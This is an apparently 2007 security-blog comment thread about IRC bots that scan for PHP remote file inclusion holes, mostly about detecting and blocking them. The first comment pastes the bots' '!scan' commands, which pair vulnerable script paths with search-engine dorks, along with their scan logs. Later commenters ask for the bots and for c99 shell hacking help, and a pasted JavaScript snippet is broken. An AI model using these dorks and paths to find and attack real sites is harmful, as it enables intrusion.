#*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*#
IRC.UNIXHELL.COM
THE BEST WORLD OF A NEW STYLE OF LIFE 100% PUR ILLEGAL SHAKING
June 13th, 2007 at 7:10 am
http://www.xshqiptaretx.org/x0rLzalboZ/stringvuln.txt
STRINGS THERE
!scan /surveys/survey.inc.php?path= inurl:surveys
!scan index.php?body= inurl:”index.php?body=”
(@Started)[Scanning] Dork: inurl:surveys
(@Searching Altavista:0 Sites)
(@Searching GOOGLE:168 Sites)
(@Searching Yahoo:0 Sites)
(@Scan)(Total:1111 Sites)
(@Scan)(websearch:24 Sites)
(@Searching Altavista:301 Sites)
(@Searching GOOGLE:307 Sites)
(@Searching Yahoo:0 Sites)
(@Scan)(Total:1929 Sites)
(@Scan)(websearch:530 Sites)
June 13th, 2007 at 11:17 am
Those are easy to detect. I loged them also, they all use:
- libwwwperl *.*
- Java user-agent.
99% of them are blocked upon entry on my site. I like clean logs.
June 13th, 2007 at 5:25 pm
I still get the daily requests, and after reading this thread, I’m going to try sil’s mod_security idea.
Thanks for the trackback.
June 19th, 2007 at 11:52 am
I have noticed that we have been getting a lot of these scripts relaying through my server and was wondering if you knew where I could redirect these bastards.
June 19th, 2007 at 2:23 pm
I dunno, I’m up for suggestions. We could create a collection of them, to start blackhole-ing them. Something you could quickly upload to openDNS or your firewall.
June 19th, 2007 at 11:27 pm
RSnake,
We’re down to figure out a nice way of making this safe and effective. In fact, I would mind running some ideas that we’re tossing about with you. Dealing with dynamic IPs is problematic sometimes and it becomes more of an issue as we provide more security-related services.
-davidu
June 20th, 2007 at 11:13 am
Yah, David, drop me an email or something.
June 20th, 2007 at 1:32 pm
I have come up with a similar script that seems to deter these scripts
setTimeout(\”trapDiv = new Div(); trapDiv.id = ‘div’+id; trapDiv.height = parseInt(id / 1000); trapDiv.innerHTML=’while (z.length ‘; \”, 2000);
June 23rd, 2007 at 2:53 am
can u give me this kind of bots
(@Started)[Scanning] Dork: inurl:surveys
(@Searching Altavista:0 Sites)
(@Searching GOOGLE:168 Sites)
(@Searching Yahoo:0 Sites)
??
September 13th, 2007 at 1:30 pm
man i am in love with this furom is there any body that can teach me on how to hack a c99 shell or how to get mine thx very much
October 3rd, 2007 at 10:06 am
PHP Include атаки
Існує такий різновид уразливостей як PHP Include. В даному разі мова йде про Remote PHP Include (Remote File Inclusion, RFI). І відповідно проводяться RFI атаки з вико…